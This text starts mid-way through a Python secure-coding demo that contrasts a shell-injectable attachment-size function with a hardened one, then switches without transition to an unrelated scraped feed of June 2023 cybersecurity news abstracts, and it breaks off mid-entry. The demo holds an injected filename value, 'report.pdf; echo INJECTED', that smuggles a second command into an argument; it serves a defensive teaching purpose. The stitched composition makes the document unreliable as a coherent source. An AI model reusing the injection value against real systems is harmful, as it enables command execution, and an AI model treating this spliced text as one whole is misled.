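    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected attachment name: {filename!r}")
    path = os.path.join(directory, filename)
    # 2) Confine the resolved path to the attachment directory.
    root = os.path.realpath(directory)
    if os.path.commonpath([root, os.path.realpath(path)]) != root:
        raise ValueError("path escapes attachment directory")
    # 3) No shell: argv list, so the name is one argument whatever it contains.
    out = subprocess.run(["wc", "-c", path], capture_output=True, text=True, check=True).stdout
    return int(out.split()[0])

def demo():
    """Runs both versions against a benign name and an injected one."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "report.pdf"), "wb") as f:
            f.write(b"%PDF-1.4 x")          # 10 bytes
        injected = "report.pdf; echo INJECTED"
        results["vulnerable_output"] = attachment_size_vulnerable(d, injected)
        results["hardened_benign"] = attachment_size_hardened(d, "report.pdf")
        try:
            attachment_size_hardened(d, injected)
            results["hardened_injected"] = "accepted"
        except ValueError:
            results["hardened_injected"] = "rejected"
    return results

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

Of the three hardening steps, dropping the shell is the one that removes the injection class outright; the allowlist and path confinement are defence in depth against the traversal and odd-character cases that an argv list alone does not cover.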

June 15, 2023 – APT

Russia-linked APT Gamaredon update TTPs in recent attacks against Ukraine Full Text

Abstract Russia-linked APT group Gamaredon is using a new toolset in attacks aimed at critical organizations in Ukraine. The Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident Ursa)...

Security Affairs

June 15, 2023 – Vulnerabilities

Chrome 114 Update Patches Critical Vulnerability Full Text

Abstract The new Chrome 114 update resolves five vulnerabilities, including four critical- and high-severity bugs reported by external researchers. The most important of these is CVE-2023-3214, a critical use-after-free flaw in Autofill payments.

Cyware

June 15, 2023 – Malware

Vidar Malware Using New Tactics to Evade Detection and Anonymize Activities Full Text

Abstract The threat actors behind the  Vidar malware  have made changes to their backend infrastructure, indicating attempts to retool and conceal their online trail in response to public disclosures about their modus operandi. "Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia," cybersecurity company Team Cymru said in a new analysis shared with The Hacker News. Vidar  is a commercial information stealer that's known to be active since late 2018. It's also a fork of another stealer malware called  Arkei  and is offered for sale between $130 and $750 depending on the subscription tier. Typically delivered through phishing campaigns and sites advertising cracked software, the malware comes with a wide range of capabilities to harvest sensitive information from infected hosts. Vidar has also been  observed  to be distributed via rogue Google Ads and a malware loader dubbed Bumblebee. Team Cymru, in a  report

The Hacker News

June 15, 2023 – Government

Cybersecurity agencies published a joint LockBit ransomware advisory Full Text

Abstract The LockBit ransomware group successfully extorted roughly $91 million from approximately 1,700 U.S. organizations since 2020. According to a joint advisory published by cybersecurity agencies, the LockBit ransomware group has successfully extorted...

Security Affairs

June 15, 2023 – Malware

Android Spyware GravityRAT Goes After WhatsApp Backups Full Text

Abstract The BingeChat campaign is ongoing and the spyware can exfiltrate WhatsApp backups and receive commands to delete files. The actor behind GravityRAT remains unknown, and the group is tracked internally as SpaceCobra.

Cyware

June 15, 2023 – Malware

Warning: GravityRAT Android Trojan Steals WhatsApp Backups and Deletes Files Full Text

Abstract An updated version of an Android remote access trojan dubbed  GravityRAT  has been found masquerading as messaging apps BingeChat and Chatico as part of a narrowly targeted campaign since June 2022. "Notable in the newly discovered campaign, GravityRAT can exfiltrate WhatsApp backups and receive commands to delete files," ESET researcher Lukáš Štefanko  said  in a new report published today. "The malicious apps also provide legitimate chat functionality based on the open-source  OMEMO  Instant Messenger app." GravityRAT is the name given to a  cross-platform malware  that's capable of targeting Windows, Android, and macOS devices. The Slovak cybersecurity firm is tracking the activity under the name SpaceCobra. The threat actor is suspected to be based in Pakistan, with recent attacks involving GravityRAT targeting military personnel in India and among the Pakistan Air Force by camouflaging it as cloud storage and entertainment apps, as  disclosed  by Meta

The Hacker News

June 15, 2023 – Government

Cyber Command reshuffles force expansion due to Navy readiness woes Full Text

Abstract The U.S. military has rearranged a years-long effort to expand the "action arm" of its top cyber forces, according to multiple sources, as leaders try to balance fighting advanced foreign threats like China with maintaining basic readiness.

Cyware

June 15, 2023 – General

New Research: 6% of Employees Paste Sensitive Data into GenAI tools as ChatGPT Full Text

Abstract The revolutionary technology of GenAI tools, such as ChatGPT, has brought significant risks to organizations' sensitive data. But what do we really know about this risk? New research by Browser Security company LayerX sheds light on the scope and nature of these risks. The report titled "Revealing the True GenAI Data Exposure Risk" provides crucial insights for data protection stakeholders and empowers them to take proactive measures. The Numbers Behind the ChatGPT Risk By analyzing the usage of ChatGPT and other generative AI apps among 10,000 employees, the report has identified key areas of concern. One alarming finding reveals that 6% of employees have pasted sensitive data into GenAI, with 4% engaging in this risky behavior on a weekly basis. This recurring action poses a severe threat of data exfiltration for organizations. The report addresses vital risk assessment questions, including the actual scope of GenAI usage across enterprise workforces, the relati

The Hacker News

June 15, 2023 – Hacker

BreachForums Returns Under the Control of ShinyHunters Hackers Full Text

Abstract The notorious hacking group ShinyHunters, which has been responsible for numerous massive data leaks in the past, has assumed control of the revived platform, raising alarm among cybersecurity experts and law enforcement agencies worldwide.

Cyware

June 15, 2023 – Attack

New Supply Chain Attack Exploits Abandoned S3 Buckets to Distribute Malicious Binaries Full Text

Abstract In what's a new kind of software supply chain attack aimed at open source projects, it has emerged that threat actors could seize control of expired Amazon S3 buckets to serve rogue binaries without altering the modules themselves. "Malicious binaries steal the user IDs, passwords, local machine environment variables, and local host name, and then exfiltrates the stolen data to the hijacked bucket," Checkmarx researcher Guy Nachshon said. The attack was first observed in the case of an npm package called  bignum , which, until version 0.13.0, relied on an Amazon S3 bucket to download pre-built binary versions of an addon named node-pre-gyp during installation. "These binaries were published on a now-expired S3 bucket which has since been claimed by a malicious third party which is now serving binaries containing malware that exfiltrates data from the user's computer," according to a  GitHub advisory  published on May 24, 2023. An unknown threat actor

The Hacker News

June 15, 2023 – General

E-Commerce Firms Are Top Targets for API, Web Apps Attacks Full Text

Abstract Hackers hit the e-commerce industry with 14 billion attacks in 15 months, pushing it to the top of the list of targets for web application and API exploits, according to a new report by Akamai.

Cyware

June 15, 2023 – Hacker

New Report Reveals Shuckworm’s Long-Running Intrusions on Ukrainian Organizations Full Text

Abstract The Russian threat actor known as  Shuckworm  has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments. Targets of the recent intrusions, which began in February/March 2023, include security services, military, and government organizations, Symantec  said  in a new report shared with The Hacker News. "In some cases, the Russian group succeeded in staging long-running intrusions, lasting for as long as three months," the cybersecurity company said. "The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian service members, reports from enemy engagements and air strikes, arsenal inventory reports, training reports, and more." Shuckworm, also known by the names Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder, is attributed to the Russia's Fe

The Hacker News

June 15, 2023 – General

Small organizations outpace large enterprises in MFA adoption Full Text

Abstract The use of MFA has nearly doubled since 2020, and phishing-resistant authenticators represent the best choice in terms of security and convenience for users, according to Okta.

Cyware

June 15, 2023 – Hacker

Microsoft Warns of New Russian State-Sponsored Hacker Group with Destructive Intent Full Text

Abstract Microsoft on Wednesday took the lid off a "novel and distinct Russian threat actor," which it said is linked to the General Staff Main Intelligence Directorate ( GRU ) and has a "relatively low success rate." The tech giant's Threat Intelligence team, which was previously tracking the group under its emerging moniker  DEV-0586 , has graduated it to a named actor dubbed  Cadet Blizzard . "Cadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion," the company  said . "While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as  Seashell Blizzard  and  Forest Blizzard ." Cadet Blizzard first came to light in January 2022 in connection with destructive cyber activity targeting Ukraine using a novel w

The Hacker News

June 15, 2023 – Attack

Microsoft Links Data Wiping Attacks on Ukraine to New Russian Threat Actor Full Text

Abstract The computing giant dubbed the threat actor Cadet Blizzard and said it's distinct from other well-known Russian military intelligence hacking groups, such as Sandworm and APT28, which is also known as Fancy Bear.

Cyware

June 15, 2023 – Criminals

LockBit Ransomware Extorts $91 Million from U.S. Companies Full Text

Abstract The threat actors behind the  LockBit  ransomware-as-a-service (RaaS) scheme have extorted $91 million following hundreds of attacks against numerous U.S. organizations since 2020. That's according to a  joint bulletin  published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and other partner authorities from Australia, Canada, France, Germany, New Zealand, and the U.K. "The LockBit ransomware-as-a-service (RaaS) attracts affiliates to use LockBit for conducting ransomware attacks, resulting in a large web of unconnected threat actors conducting wildly varying attacks," the agencies  said . LockBit, which first burst onto the scene in late 2019, has continued to be disruptive and prolific, targeting as many as 76 victims in May 2023 alone, per statistics shared by  Malwarebytes  last week. The Russia-linked cartel has claimed responsibil

The Hacker News

June 14, 2023 – Vulnerabilities

ICS Patch Tuesday: Siemens Addresses Over 180 Third-Party Component Vulnerabilities Full Text

Abstract Siemens has released a dozen new advisories covering roughly 200 vulnerabilities, with a majority of these flaws impacting third-party components. Schneider Electric has released four advisories covering five vulnerabilities.

Cyware

June 14, 2023 – Hacker

Chinese Hackers Exploit VMware Zero-Day to Backdoor Windows and Linux Systems Full Text

Abstract The Chinese state-sponsored group known as  UNC3886  has been found to exploit a zero-day flaw in VMware ESXi hosts to backdoor Windows and Linux systems. The VMware Tools authentication bypass vulnerability, tracked as  CVE-2023-20867  (CVSS score: 3.9), "enabled the execution of privileged commands across Windows, Linux, and PhotonOS (vCenter) guest VMs without authentication of guest credentials from a compromised ESXi host and no default logging on guest VMs," Mandiant  said . UNC3886 was  initially documented  by the Google-owned threat intelligence firm in September 2022 as a cyber espionage actor infecting VMware ESXi and vCenter servers with backdoors named VIRTUALPITA and VIRTUALPIE. Earlier this March, the group was  linked  to the exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system to deploy implants on the network appliances and interact with the aforementioned malware. The threat actor has been described as a

The Hacker News

June 14, 2023 – APT

Microsoft links Cadet Blizzard APT to Russia’s military intelligence GRU Full Text

Abstract Microsoft linked a series of wiping attacks to a Russia-linked APT group, tracked as Cadet Blizzard, that is under the control of the GRU. Microsoft attributes the operations carried out by the Russia-linked APT group tracked as Cadet Blizzard to the Russian...

Security Affairs

June 14, 2023 – Malware

Deep dive into the Pikabot cyber threat Full Text

Abstract Pikabot operates as a backdoor, enabling remote access to compromised systems, and receives commands from a C2 server. It uses anti-analysis techniques and deploys an injector to run tests before injecting its core module into a specified process.

Cyware

June 14, 2023 – Vulnerabilities

Severe Vulnerabilities Reported in Microsoft Azure Bastion and Container Registry Full Text

Abstract Two "dangerous" security vulnerabilities have been disclosed in Microsoft Azure Bastion and Azure Container Registry that could have been exploited to carry out cross-site scripting (XSS) attacks. "The vulnerabilities allowed unauthorized access to the victim's session within the compromised Azure service iframe, which can lead to severe consequences, including unauthorized data access, unauthorized modifications, and disruption of the Azure services iframes," Orca security researcher Lidor Ben Shitrit said in a report shared with The Hacker News. XSS attacks take place when threat actors inject arbitrary code into an otherwise trusted website, which then gets executed every time unsuspecting users visit the site. The two flaws identified by Orca leverage a weakness in the postMessage iframe, which enables cross-origin communication between Window objects. This meant that the shortcoming could be abused to embed endpoints within remote servers usin

The Hacker News

June 14, 2023 – Vulnerabilities

Critical flaw found in WooCommerce Stripe Gateway Plugin used by +900K sites Full Text

Abstract Hundreds of thousands of online stores are potentially exposed to hacking due to a critical vulnerability in the WooCommerce Stripe Payment Gateway plugin. The WooCommerce Stripe Payment Gateway plugin is affected by a critical vulnerability tracked...

Security Affairs

June 14, 2023 – Malware

New PikaBot Trojan Executes Diverse Range of Commands Full Text

Abstract Researchers have dissected a new modular malware trojan, dubbed Pikabot, that can execute a diverse range of malicious commands. The trojan self-terminates if the system’s language is Georgian, Kazakh, Uzbek, or Tajik. To stay safe, organizations must deploy the necessary detection tools to root o ...

Cyware

June 14, 2023 – Malware

New Golang-based Skuld Malware Stealing Discord and Browser Data from Windows PCs Full Text

Abstract A new Golang-based information stealer called  Skuld  has compromised Windows systems across Europe, Southeast Asia, and the U.S. "This new malware strain tries to steal sensitive information from its victims," Trellix researcher Ernesto Fernández Provecho  said  in a Tuesday analysis. "To accomplish this task, it searches for data stored in applications such as Discord and web browsers; information from the system and files stored in the victim's folders." Skuld, which shares overlaps with publicly available stealers like  Creal Stealer ,  Luna Grabber , and  BlackCap Grabber , is the handiwork of a developer who goes by the online alias Deathined on various social media platforms like GitHub, Twitter, Reddit, and Tumblr. Also spotted by Trellix is a Telegram group named deathinews, indicating that these online avenues could be used to promote the offering in the future as a service for other threat actors. The malware, upon execution, checks if it's

The Hacker News

June 14, 2023 – Attack

Unveiling the Balada injector: a malware epidemic in WordPress Full Text

Abstract Learn the shocking truth behind the Balada Injector campaign and find out how to protect your organization from this relentless viral invasion. A deadly cyber campaign has been working silently to undermine website security by exploiting popular WordPress...

Security Affairs

June 14, 2023 – Breach

Over 181,000 Patients’ Records at Pennsylvania Cardiology Group Breached Full Text

Abstract The breach of the cardiology group first occurred on Feb 2 in data maintained by Commonwealth Health Physician Network-Cardiology, aka Great Valley Cardiology (GVC). The breach wasn't discovered until April 13, the system said in a news release.

Cyware

June 14, 2023 – Education

Where from, Where to — The Evolution of Network Security Full Text

Abstract For the better part of the 90s and early aughts, the sysadmin handbook said, "Filter your incoming traffic, not everyone is nice out there" (later coined by Gandalf as "You shall not pass"). So CIOs started to supercharge their network fences with every appliance they could get to protect against inbound (aka INGRESS) traffic. In the wake of the first mass phishing campaigns in the early 2010s, it became increasingly obvious that someone had to deal with the employees and, more specifically, their stunning capacity to click on every link they'd receive. Outbound traffic filtering (aka EGRESS) became an obsession. Browser security, proxies, and other glorified antiviruses became the must-have every consulting firm would advise their clients to get their hands on ASAP. The risk was real, and the response was fairly adapted, but it also contributed to the famous "super soldier" stance. I'm alone against an army? So be it, I'll dig a t

The Hacker News

June 14, 2023 – APT

China-linked APT UNC3886 used VMware ESXi Zero-Day Full Text

Abstract A China-linked APT group tracked as UNC3886 has been spotted exploiting a VMware ESXi zero-day vulnerability. Mandiant researchers observed a China-linked cyberespionage group, tracked as UNC3886, exploiting a VMware ESXi zero-day vulnerability tracked...

Security Affairs

June 14, 2023 – Disinformation

France accuses Russians of impersonating French government and media to spread disinformation Full Text

Abstract The campaign impersonated four of France's most popular daily newspapers — 20 Minutes, Le Monde, Le Parisien, and Le Figaro — publishing “at least 58 articles” on the fake sites to push these false narratives, according to VIGINIUM.

Cyware

June 14, 2023 – Malware

Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits Full Text

Abstract At least half a dozen GitHub accounts from fake researchers associated with a fraudulent cybersecurity company have been observed pushing malicious repositories on the code hosting service. All seven repositories, which are still available as of writing, claim to be a proof-of-concept (PoC) exploit for purported zero-day flaws in Discord, Google Chrome, and Microsoft Exchange Server. VulnCheck, which discovered the activity, said, "the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security." The cybersecurity firm said it first came across the rogue repositories in early May when they were observed releasing similar PoC exploits for zero-day bugs in Signal and WhatsApp. The two repositories have since been taken down. Besides sharing some of the purported findings on Twitter in an attem

The Hacker News

June 14, 2023 – Malware

LLM meets Malware: Starting the Era of Autonomous Threat Full Text

Abstract Malware researchers analyzed the application of Large Language Models (LLM) to malware automation, investigating future abuse in autonomous threats. Executive Summary In this report we shared some insight that emerged during our exploratory research,...

Security Affairs

June 14, 2023 – Malware

BatCloak: Obfuscation Solution Outwitting 80% of AV Engines Full Text

Abstract Trend Micro cautioned about the utilization of BatCloak, a tool designed to obfuscate batch files and evade antivirus detection engines with an 80% success rate. This ongoing research showcases the continuous evolution of the BatCloak engine, aiming to achieve compatibility with a wide range of mal ...

Cyware

June 14, 2023 – Vulnerabilities

Critical Security Vulnerability Discovered in WooCommerce Stripe Gateway Plugin Full Text

Abstract A security flaw has been uncovered in the WooCommerce Stripe Gateway WordPress plugin that could lead to the unauthorized disclosure of sensitive information. The flaw, tracked as CVE-2023-34000, impacts versions 7.4.0 and below. It was addressed by the plugin maintainers in version 7.4.1, which shipped on May 30, 2023. WooCommerce Stripe Gateway allows e-commerce websites to directly accept various payment methods through Stripe's payment processing API. It boasts of over 900,000 active installations. According to Patch security researcher Rafie Muhammad, the plugin suffers from what's called an unauthenticated insecure direct object reference (IDOR) vulnerability, which allows a bad actor to bypass authorization and access resources. Specifically, the problem stems from the insecure handling of order objects and a lack of adequate access control mechanisms in the plugin's 'javascript_params' and 'payment_fields' functions. "Thi

The Hacker News

June 14, 2023 – Business

Thales to Buy Tesserent for $119.1M to Aid Australian Growth Full Text

Abstract A French conglomerate plans to purchase Australia's largest publicly traded cybersecurity company to expand its cyber service delivery capability in the high-growth Oceania market.

Cyware

June 14, 2023 – Vulnerabilities

Microsoft Releases Updates to Patch Critical Flaws in Windows and Other Software Full Text

Abstract Microsoft has rolled out fixes for its Windows operating system and other software components to remediate major security shortcomings as part of  Patch Tuesday updates  for June 2023. Of the 73 flaws, six are rated Critical, 63 are rated Important, two are rated Moderate, and one is rated Low in severity. This also includes three issues the tech giant addressed in its Chromium-based Edge browser. It's worth noting that Microsoft also closed out  26 other flaws  in Edge – all of them rooted in Chromium itself – since the release of May Patch Tuesday updates. This comprises  CVE-2023-3079 , a zero-day bug that Google disclosed as being actively exploited in the wild last week. The June 2023 updates also mark the first time in several months that doesn't feature any zero-day flaw in Microsoft products that's publicly known or under active attack at the time of release. Topping the list of fixes is  CVE-2023-29357  (CVSS score: 9.8), a privilege escalation flaw in ShareP

The Hacker News

June 14, 2023 – Attack

New Research Shows Potential of Electromagnetic Fault Injection Attacks Against Drones Full Text

Abstract New research shows the potential of electromagnetic fault injection (EMFI) attacks against unmanned aerial vehicles, with experts showing how drones that don’t have any known vulnerabilities could be hacked.

Cyware

June 13, 2023 – Breach

Update: Xplain data breach also impacted the national Swiss railway FSS Full Text

Abstract The Play ransomware attack suffered by the IT services provider Xplain is worse than initially estimated, the incident also impacted the national railway company of Switzerland (FSS) and the canton of Aargau.

Cyware

June 13, 2023 – Malware

Beware: New DoubleFinger Loader Targets Cryptocurrency Wallets with Stealer Full Text

Abstract A novel multi-stage loader called  DoubleFinger  has been observed delivering a cryptocurrency stealer dubbed GreetingGhoul in what's an advanced attack targeting users in Europe, the U.S., and Latin America. "DoubleFinger is deployed on the target machine, when the victim opens a malicious PIF attachment in an email message, ultimately executing the first of DoubleFinger's loader stages," Kaspersky researcher Sergey Lozhkin  said  in a Monday report. The starting point of the attacks is a modified version of  espexe.exe  – which refers to Microsoft Windows Economical Service Provider application – that's engineered to execute shellcode responsible for retrieving a PNG image file from the image hosting service Imgur. The image employs steganographic trickery to conceal an encrypted payload that triggers a four-stage compromise chain which eventually culminates in the execution of the GreetingGhoul stealer on the infected host. A notable aspect of GreetingGho

The Hacker News

June 13, 2023 – Vulnerabilities

Microsoft Patch Tuesday for June 2023 fixes 6 critical flaws Full Text

Abstract Microsoft Patch Tuesday security updates for June 2023 fixed 69 flaws in its products, including six critical issues. Microsoft Patch Tuesday security updates for June 2023 fixed 69 vulnerabilities in multiple products, including Microsoft Windows...

Security Affairs

June 13, 2023 – General

Lack of adequate investments hinders identity security efforts Full Text

Abstract Organizations are still grappling with identity-related incidents, with an alarming 90% reporting one in the last 12 months, a 6% increase from last year, according to The Identity Defined Security Alliance (IDSA).

Cyware

June 13, 2023 – General

Over Half of Security Leaders Lack Confidence in Protecting App Secrets, Study Reveals Full Text

Abstract It might come as a surprise, but secrets management has become the elephant in the AppSec room. While security vulnerabilities like Common Vulnerabilities and Exposures (CVEs) often make headlines in the cybersecurity world, secrets management remains an overlooked issue that can have immediate and impactful consequences for corporate safety.  A recent study by GitGuardian found that 75% of IT decision-makers in the US and the UK reported at least one secret leaked from an application, with 60% causing issues for the company or employees. Shockingly, less than half of respondents (48%) were confident in their ability to protect application secrets "to a great extent." The study, named  Voice of Practitioners: The State of Secrets in AppSec  (available for free download  here ), provides a fresh perspective on managing secrets, which is often reduced to clichés that do not reflect the operational reality in engineering departments.  Despite their ubiquity in modern cloud a

The Hacker News

June 13, 2023 – Outage

St. Margaret’s Health is the first hospital to cite a cyberattack as a reason for its closure Full Text

Abstract St. Margaret’s Health in Illinois is partly closing operations at its hospitals due to a 2021 ransomware attack that impacted its payment system. In February 2021, a ransomware attack hit St. Margaret’s Health in Illinois and forced the organization...

Security Affairs

June 13, 2023 – Outage

Ransomware Attack Played Major Role in Shutdown of Illinois Hospital Full Text

Abstract The attack occurred in February 2021 and forced the shutdown of the Spring Valley hospital’s computer network, impacting all web-based operations, including its patient portal. The Peru branch was not affected, as it operated on a separate system.

Cyware

June 13, 2023 – Attack

Adversary-in-the-Middle Attack Campaign Hits Dozens of Global Organizations Full Text

Abstract "Dozens" of organizations across the world have been targeted as part of a broad business email compromise ( BEC ) campaign that involved the use of adversary-in-the-middle ( AitM ) techniques to carry out the attacks. "Following a successful phishing attempt, the threat actor gained initial access to one of the victim employee's account and executed an 'adversary-in-the-middle' attack to bypass Office365 authentication and gain persistence access to that account," Sygnia researchers  said  in a report shared with The Hacker News. "Once gaining persistence, the threat actor exfiltrated data from the compromised account and used his access to spread the phishing attacks against other victim's employees along with several external targeted organizations." The findings come less than a week after Microsoft  detailed  a similar combination of an AitM phishing and a BEC attack aimed at banking and financial services organizations. BEC scam

The Hacker News

June 13, 2023 – Breach

A database containing data of +8.9 million Zacks users was leaked online Full Text

Abstract A database containing the personal information of more than 8.9 million Zacks Investment Research users was leaked on a cybercrime forum. A database containing personal information of 8,929,503 Zacks Investment Research users emerged on a popular...

Security Affairs

June 13, 2023 – Cryptocurrency

DoubleFinger Loader Delivers GreetingGhoul Stealer to Target Crypto Wallets Full Text

Abstract Cybercriminals have added a new malware loader called DoubleFinger to their arsenal for stealing cryptocurrency and business information. GreetingGhoul comprises two major components that work together to steal cryptocurrency credentials. To protect themselves, organizations must look at the ...

Cyware

June 13, 2023 – Education

Webinar - Mastering API Security: Understanding Your True Attack Surface Full Text

Abstract Believe it or not, your attack surface is expanding faster than you realize. How? APIs, of course! More formally known as application programming interfaces, API calls are growing twice as fast as HTML traffic, making APIs an ideal candidate for new security solutions aimed at protecting customer data, according to Cloudflare. According to the "Quantifying the Cost of API Insecurity" report, US businesses incurred upwards of $23 billion in losses from API-related breaches in 2022. In fact, 76% of cybersecurity professionals admitted to experiencing an API-related security incident. This is why you can't afford to ignore your API security posture, especially when you consider that APIs don't exist in a vacuum. The infrastructure components powering those critical APIs can suffer from security misconfigurations as well, leaving you open to unexpected breaches. However, this isn't something you or your AppSec teams can take on alone, both in terms of volume and

The Hacker News

June 13, 2023 – Vulnerabilities

Fortinet urges to patch the critical RCE flaw CVE-2023-27997 in Fortigate firewalls Full Text

Abstract Fortinet addressed a new critical flaw, tracked as CVE-2023-27997, in FortiOS and FortiProxy that is likely exploited in a limited number of attacks. Fortinet has finally published an official advisory about the critical vulnerability, tracked as CVE-2023-27997 (CVSS...

Security Affairs

June 13, 2023 – Malware

SPECTRALVIPER Backdoor Focuses on Vietnamese Public Companies Full Text

Abstract Vietnamese public companies have been targeted by the SPECTRALVIPER backdoor in an ongoing campaign. The backdoor, a previously undisclosed x64 variant, offers various capabilities including file manipulation, token impersonation, and PE loading. SPECTRALVIPER can be compiled as an executable o ...

Cyware

June 13, 2023 – Criminals

Two Russian Nationals Charged for Masterminding Mt. Gox Crypto Exchange Hack Full Text

Abstract The U.S. Department of Justice (DoJ) has charged two Russian nationals in connection with masterminding the 2014 digital heist of the now-defunct cryptocurrency exchange Mt. Gox. According to unsealed indictments released last week, Alexey Bilyuchenko, 43, and Aleksandr Verner, 29, have been accused of conspiring to launder approximately 647,000 bitcoins stolen from September 2011 through at least May 2014 as a result of unauthorized access to a server holding crypto wallets used by Mt. Gox customers. "Starting in 2011, Bilyuchenko and Verner stole a massive amount of cryptocurrency from Mt. Gox, contributing to the exchange's ultimate insolvency," Assistant Attorney General Kenneth A. Polite, Jr.  said  in a statement. "Armed with the ill-gotten gains from Mt. Gox, Bilyuchenko allegedly went on to help set up the notorious  BTC-e virtual currency exchange , which laundered funds for cyber criminals worldwide." Bilyuchenko and Verner are also alleged to hav

The Hacker News

June 13, 2023 – Breach

UK communications regulator Ofcom hacked with a MOVEit file transfer zero-day Full Text

Abstract UK communications regulator Ofcom suffered a data breach after a Clop ransomware attack exploiting the MOVEit file transfer zero-day. UK's communications regulator Ofcom disclosed a data breach after a Clop ransomware attack. The threat actors exploited...

Security Affairs

June 13, 2023 – Vulnerabilities

Experts released PoC exploit for MOVEit Transfer CVE-2023-34362 flaw Full Text

Abstract Security researchers from Horizon3 have released a proof-of-concept (PoC) exploit code for the CVE-2023-34362 flaw. The experts created the PoC exploit by performing reverse engineering of the patch released by the company.

Cyware

June 13, 2023 – Phishing

New Phishing Scam Spoofs German Media, Broadband Conference Anga Full Text

Abstract Hackers have devised an intricate phishing attack by leveraging the reputation of Germany’s renowned Anga Com conference to send spoofed emails and create deceptive web pages, deceiving unsuspecting users into divulging their login credentials.

Cyware

June 13, 2023 – Vulnerabilities

Critical FortiOS and FortiProxy Vulnerability Likely Exploited - Patch Now! Full Text

Abstract Fortinet on Monday disclosed that a  newly patched critical flaw  impacting FortiOS and FortiProxy may have been "exploited in a limited number of cases" in attacks targeting government, manufacturing, and critical infrastructure sectors. The  vulnerability , tracked as  CVE-2023-27997  (CVSS score: 9.2), concerns a  heap-based buffer overflow  vulnerability in FortiOS and FortiProxy SSL-VPN that could allow a remote attacker to execute arbitrary code or commands via specifically crafted requests. LEXFO security researchers Charles Fol and Dany Bach have been credited with discovering and reporting the flaw. It was addressed by Fortinet on June 9, 2023 in the following versions - FortiOS-6K7K version 7.0.12 or above FortiOS-6K7K version 6.4.13 or above FortiOS-6K7K version 6.2.15 or above FortiOS-6K7K version 6.0.17 or above FortiProxy version 7.2.4 or above FortiProxy version 7.0.10 or above FortiProxy version 2.0.13 or above FortiOS version 7.4.0 or above Fort

The Hacker News

June 13, 2023 – Vulnerabilities

Experts released PoC exploit for MOVEit Transfer CVE-2023-34362 flaw Full Text

Abstract Security firm Horizon3 released proof-of-concept (PoC) exploit code for the remote code execution (RCE) flaw CVE-2023-34362 in the MOVEit Transfer MFT. MOVEit Transfer is a managed file transfer that is used by enterprises to securely transfer files...

Security Affairs

June 12, 2023 – General

Factors influencing IT security spending Full Text

Abstract Security executives are overwhelmingly craving more AI solutions in 2023 to help them battle the growing cybersecurity threat landscape, according to a report by Netrix Global.

Cyware

June 12, 2023 – Ransomware

New Entrants to Ransomware Unleash Frankenstein Malware Full Text

Abstract In their haste to make money, some new players are picking over the discarded remnants of previous ransomware groups, cobbling together ransomware rather than going through the trouble of coding bespoke crypto-locking software.

Cyware

June 12, 2023 – Vulnerabilities

Researchers Uncover Publisher Spoofing Bug in Microsoft Visual Studio Installer Full Text

Abstract Security researchers have warned about an "easily exploitable" flaw in the Microsoft Visual Studio installer that could be abused by a malicious actor to impersonate a legitimate publisher and distribute malicious extensions. "A threat actor could impersonate a popular publisher and issue a malicious extension to compromise a targeted system," Varonis researcher Dolev Taler  said . "Malicious extensions have been used to steal sensitive information, silently access and change code, or take full control of a system." The vulnerability, which is tracked as  CVE-2023-28299  (CVSS score: 5.5), was addressed by Microsoft as part of its  Patch Tuesday updates  for April 2023, describing it as a spoofing flaw. The bug discovered by Varonis has to do with the Visual Studio user interface, which allows for spoofed publisher digital signatures. Specifically, it trivially bypasses a restriction that prevents users from entering information in the "product

The Hacker News

June 12, 2023 – Breach

Intellihartx data breach exposed the personal and health info of 490,000 individuals Full Text

Abstract Intellihartx is notifying about 490,000 individuals that their personal information was compromised in the GoAnywhere zero-day attack in January. The Clop ransomware group stole personal and health information of 489,830 individuals as a result...

Security Affairs

June 12, 2023 – Breach

San Francisco 49ers agree to pay out victims of 2022 data breach Full Text

Abstract According to The Athletic, three class action lawsuits related to the breach were combined into one case. The plaintiffs filed settlement papers in California federal court, the site reported, which they described as an “unopposed motion.”

Cyware

June 12, 2023 – General

Why Now? The Rise of Attack Surface Management Full Text

Abstract The term " attack surface management " (ASM) went from unknown to ubiquitous in the cybersecurity space over the past few years. Gartner and Forrester have both highlighted the  importance of ASM  recently, multiple solution providers have emerged in the space, and investment and acquisition activity have seen an uptick. Many concepts come and go in cybersecurity, but attack surface management promises to have staying power. As it evolves into a critical component of threat and exposure management strategies, it's worth examining why attack surface management has grown to become a key category, and why it will continue to be a necessity for organizations worldwide. What is Attack Surface Management?  Attack surfaces are rapidly expanding. The attack surface includes any IT asset connected to the internet – applications, IoT devices, Kubernetes clusters, cloud platforms – that threat actors could infiltrate and exploit to perpetuate an attack. A company's attack surface fa

The Hacker News

June 12, 2023 – Malware

FUD Malware obfuscation engine BatCloak continues to evolve Full Text

Abstract Researchers detailed a fully undetectable (FUD) malware obfuscation engine named BatCloak that is used by threat actors. Researchers from Trend Micro have analyzed the BatCloak, a fully undetectable (FUD) malware obfuscation engine used by threat...

Security Affairs

June 12, 2023 – Botnet

IoT Botnet DDoS Attacks Threaten Global Telecom Networks, Nokia Reports Full Text

Abstract In addition to the rise in botnet-driven DDoS attacks, Nokia's Threat Intelligence Report highlighted a doubling in the number of trojans targeting personal banking information on mobile devices, now accounting for 9% of all infections.

Cyware

June 12, 2023 – Criminals

Cybercriminals Using Powerful BatCloak Engine to Make Malware Fully Undetectable Full Text

